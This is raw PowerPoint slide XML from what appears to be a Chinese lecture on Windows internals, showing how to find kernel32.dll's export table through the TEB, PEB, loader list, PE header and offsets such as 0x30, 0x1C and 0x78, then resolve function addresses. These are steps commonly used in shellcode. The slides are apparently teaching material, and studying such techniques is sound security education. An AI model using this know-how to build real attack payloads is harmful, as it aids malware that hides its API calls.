                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>导出函数名列表指针的基地址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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0946"/>
            <a:ext cx="4824536" cy="371961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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kernel32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="16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函数名列表地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2E2779C-4759-04C4-2A31-A8FF80980C5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793642" y="1155219"/>
            <a:ext cx="4649863"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定位</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>kernel32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>导出表示例代码</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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9008952-735C-8DAE-25D3-3AA6BC5DA82E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6456363" y="3028950"/>
            <a:ext cx="4826000" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269251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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  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3" name="组合 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC1E6FBB-704F-4DA4-6EB1-B6AAA74DAF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="2051270"/>
            <a:ext cx="10359374" cy="885169"/>
            <a:chOff x="-10772707" y="1052512"/>
            <a:chExt cx="21633244" cy="885169"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="矩形 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37629905-4BEB-B69D-1403-4952745F329F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-10772707" y="1052513"/>
              <a:ext cx="1510925" cy="88516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1</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F4378390-4E52-C658-8F91-FD6EBD797488}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-9261780" y="1052512"/>
              <a:ext cx="20122317" cy="88516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函数的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地址和名字按照顺序存放在上述两个列表中，可以在名称列表中定位到所需的函数是第几个，然后在地址列表中找到对应的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RVA</a:t>
              </a:r>
              <a:endPar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3" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93D02888-4A05-7C44-8237-01F4B4012389}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="3292389"/>
            <a:ext cx="10359374" cy="883909"/>
            <a:chOff x="-10772707" y="765386"/>
            <a:chExt cx="21633244" cy="883909"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{720C1F86-A12B-C397-8441-7E4ADD4C3D95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-10772707" y="765386"/>
              <a:ext cx="1510925" cy="883908"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D6D6D6"/>
            </a:solid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lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1"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 name="矩形 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8F097E8-BBB2-6CE2-73D4-B12B5F3632A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-9261780" y="765386"/>
              <a:ext cx="20122317" cy="883909"/>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获得</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后，再加上前边已经得到的动态链接库的加载地址，就获得了所需</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此刻在内存中的虚拟地址，这个地址就是最终在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中调用时需要的地址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A419E2-6B1A-ED7C-309C-2805285096BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="927740" y="1211655"/>
            <a:ext cx="10359374" cy="406971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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可以通过遍历两个函数相关列表，算出所需函数的入口地址：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298242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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43928A29-41E7-E367-3322-F1BAED3EC92F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880153" y="142582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FS</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nvGrpSpPr>
          <p:cNvPr id="113" name="组合 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5E9735-DDCC-6E56-9BFD-4B13902B3ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2725958" y="1425820"/>
            <a:ext cx="1404307" cy="353863"/>
            <a:chOff x="1583023" y="1152799"/>
            <a:chExt cx="1404307" cy="353863"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{831486B1-E2E2-7251-1E9C-B70E42B7837D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158302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TEB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0" name="矩形 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52D3621C-6D49-326C-361C-B441A2744C97}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2137813" y="1152800"/>
              <a:ext cx="554790" cy="35386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0x30</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2" name="矩形 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC869526-303E-4EA9-A2F0-34900BB9ACA1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2692603" y="1152799"/>
              <a:ext cx="294727" cy="353863"/>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2" name="组合 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{814D7254-4B9F-F347-6758-A3F1C1610915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4421280" y="1425245"/>
            <a:ext cx="1417630" cy="355012"/>
            <a:chOff x="3129918" y="1149276"/>
            <a:chExt cx="1417630" cy="355012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="矩形 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AC452E7-7C58-1557-74C8-D239979D130C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3129918" y="1149276"/>
              <a:ext cx="55479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PEB</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4" name="矩形 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F099DD95-EC3D-B700-E3AE-2897E461D1F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3684708" y="1149276"/>
              <a:ext cx="579781"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5" name="矩形 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E787586B-844F-A740-3041-DE418889155C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4262785" y="1149276"/>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11" name="组合 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD048E3-0CBB-EA3D-60D4-F02FAB09888D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6129925" y="1425245"/>
            <a:ext cx="1441656" cy="355012"/>
            <a:chOff x="4672390" y="1149276"/>
            <a:chExt cx="1441656" cy="355012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="矩形 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6E249C4-0243-20EA-6B05-F668EE2F125B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4672390"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LDR</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8" name="矩形 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A3ACD72-B4C7-8D2E-3DBD-1F89BE8402B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5257552" y="1149276"/>
              <a:ext cx="579782"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0x1C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C08473DF-8815-A3E0-0336-008E7D172E1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5831830" y="1149276"/>
              <a:ext cx="282216"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08" name="组合 107">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5D6786-FD90-75C5-A23A-6BA4C52A8A76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9250048" y="1425245"/>
            <a:ext cx="1995761" cy="355012"/>
            <a:chOff x="9250048" y="1409252"/>
            <a:chExt cx="1995761" cy="355012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="矩形 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B35A1D-467C-3201-FF49-D86B6E77D49C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9250048" y="1409252"/>
              <a:ext cx="12588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A4DC0895-0ABC-CF08-3D69-0C12C3495F72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10959581" y="1409252"/>
              <a:ext cx="286228"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49" name="矩形 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC8F65C3-20FA-73B7-62C9-F9EFEA80738F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10508876" y="1409252"/>
              <a:ext cx="450705"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0x8</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74" name="矩形 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47A82BED-36EC-B329-3FD5-824CF5381C1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6709702" y="3720629"/>
            <a:ext cx="1850165" cy="6159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函数地址列表</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RVA</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76" name="直线箭头连接符 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5589AC2-806F-069B-9B19-CD3E8A87FE19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="14" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2311424" y="1602752"/>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FA60A427-D4AB-8B91-D124-96DA45D7B63D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7862596" y="1425245"/>
            <a:ext cx="1096440" cy="355012"/>
            <a:chOff x="7752184" y="1409252"/>
            <a:chExt cx="1096440" cy="355012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="矩形 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDA27784-287C-E7F7-6B0A-650A505F64BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7752184" y="1409252"/>
              <a:ext cx="809740"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rPr>
                <a:t>ntdll.dll</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3" name="矩形 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{491D5E4B-3C12-B1BA-565D-791EE4D4FFAF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8563861" y="1409252"/>
              <a:ext cx="28476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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="121" name="组合 120">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD318104-8C90-7961-C6B1-DF7B13758D9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5030899" y="2573759"/>
            <a:ext cx="1417387" cy="355010"/>
            <a:chOff x="4540570" y="2334970"/>
            <a:chExt cx="1417387" cy="355010"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="矩形 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7D0EC84-30AB-3C8F-D3C9-06C4CE5ED78B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4540570" y="2337301"/>
              <a:ext cx="575222"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PE</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头</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="矩形 68">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C3E069F-8BE6-111B-75D7-999C239A51D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5115792" y="2337302"/>
              <a:ext cx="575216"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0x78</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7" name="矩形 86">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41CACE94-1D8B-6069-0E34-560BF8874DB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5691008" y="2334970"/>
              <a:ext cx="266949" cy="3550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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="88" name="直线箭头连接符 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72885CEF-98EC-1C45-30F0-04FCF3D7E9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8426389" y="2787449"/>
            <a:ext cx="0" cy="933178"/>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0" name="组合 119">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DA446D0-D710-0748-09B3-FC33F682D123}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6910344" y="2573758"/>
            <a:ext cx="2489260" cy="355012"/>
            <a:chOff x="8752313" y="2579579"/>
            <a:chExt cx="2489260" cy="355012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="矩形 69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{823EBA7E-125F-F204-4076-56A378D44B71}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10134882" y="2579579"/>
              <a:ext cx="26695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72" name="矩形 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F24A46-257B-23ED-06E6-84D54DAF43FE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8752313" y="2579579"/>
              <a:ext cx="806505" cy="35501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导出表</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="矩形 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D17B3A-DF3C-7B7A-1F0F-59267647F978}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9562097" y="2579579"/>
              <a:ext cx="572785" cy="35501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0x1C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89" name="矩形 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD1AE8E-32F4-A5FD-14FB-F292AF1088F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10401835" y="2579579"/>
              <a:ext cx="572785"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0x20</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90" name="矩形 89">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{045C9156-D66E-344E-4D5A-06F66CB5CC49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10974620" y="2579579"/>
              <a:ext cx="266953" cy="35501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92" name="矩形 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C28944DE-85A8-62E2-5480-6EA4BC73BC7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9132650" y="3720627"/>
            <a:ext cx="1970039" cy="615909"/>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函数名称列表</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gn="ct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（字符串）</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93" name="矩形 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2AAEBF1-C14A-56A0-2D3C-1871E15F2056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1730576" y="3683818"/>
